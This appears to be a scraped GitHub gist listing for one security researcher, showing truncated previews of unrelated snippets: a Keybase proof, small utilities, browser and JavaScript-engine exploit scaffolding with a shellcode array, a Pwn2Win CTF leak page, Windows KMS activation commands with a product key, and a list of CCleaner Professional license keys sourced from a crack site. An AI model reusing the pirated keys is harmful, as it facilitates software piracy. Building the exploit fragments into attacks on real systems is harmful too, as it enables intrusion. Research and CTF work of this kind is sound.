I hereby claim:
- I am Siguza on github.
- I am siguza (https://keybase.io/siguza) on keybase.
- I have a public key whose fingerprint is 6393 3A9D E301 7C59 ADE5 3EBB 1591 E8CA 0BCA 036F
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
Moved here: https://github.com/Siguza/ios-build/blob/master/libimobiledevice/build.sh |
/* | |
* img3ex.c - Extract Img3 files from any binary blob, e.g. a /dev/disk* dump. | |
* | |
* Placed in the Public Domain, do whatever you want with it. No warranty of any kind. | |
* | |
* Compile with: cc -o img3ex -std=c11 -Wall -O3 img3ex.c | |
*/ | |
#include <errno.h> // errno | |
#include <fcntl.h> // open, O_RDONLY |
/* | |
* t2048.c - 2048 for some TI calculators | |
* | |
* Copyright (c) 2014 Siguza | |
* | |
* Tested on TI-89 Titanium only. According to headers, it should work on TI-92 and Voyage 200 as well, but no promises. | |
* To be compiled with ti-gcc - as far as I remember, TI's own C compiler can't handle this. | |
* | |
* Licensed under MIT, i.e. feel free to use and redistribute at will, but I'd appreciate some credit. :) | |
*/ |
<script> | |
function gc() { | |
for (var i = 0; i < 0x80000; ++i) { | |
var a = new ArrayBuffer(); | |
} | |
} | |
let shellcode = [ | |
// Move x18 to x28 (TEB) |
## Find Available Target Editions | |
DISM.exe /Online /Get-TargetEditions | |
## Convert Server Standard 2019 Evaluation to Server Standard 2019 | |
DISM /online /Set-Edition:ServerStandard /ProductKey:N69G4-B89J2-4G8F4-WWYCC-J464C /AcceptEula | |
## How To Activate | |
slmgr /ipk XXXXX-XXXXX-XXXXX-XXXXX-XXXXX | |
slmgr /skms [server]:[port] | |
slmgr /ato |
import requests | |
import time | |
import sys | |
from base64 import b64encode | |
from requests_ntlm2 import HttpNtlmAuth | |
from urllib3.exceptions import InsecureRequestWarning | |
from urllib import quote_plus | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>Pwn2Win | MessageKeeper</title> | |
</head> | |
<body> | |
<script> | |
let alphabet = "0123456789abcdef"; | |
const sleep = (ms) => { |
// Load Int library, thanks saelo! | |
load('util.js'); | |
load('int64.js'); | |
// Helpers to convert from float to in a few random places | |
var conva = new ArrayBuffer(8); | |
var convf = new Float64Array(conva); | |
var convi = new Uint32Array(conva); | |
var convi8 = new Uint8Array(conva); |
C2YW-IAHG-ZU62-INZQ-WZPC | |
C2YW-2BAM-ADC2-89RV-YZPC | |
C2YW-XFCX-ABIG-GZD4-8ZPC | |
C2YW-XK32-GBVV-N3BH-2ZPC | |
C2YW-JKW5-KK79-XHR2-4ZPC | |
C2YW-QTRT-ZVCG-PQDK-CZPC | |
C2YW-GP33-TPIU-BGM8-AZPC | |
Source: http://windowsloaders.com/ccleaner-professional-plus-crack-for-windows/ |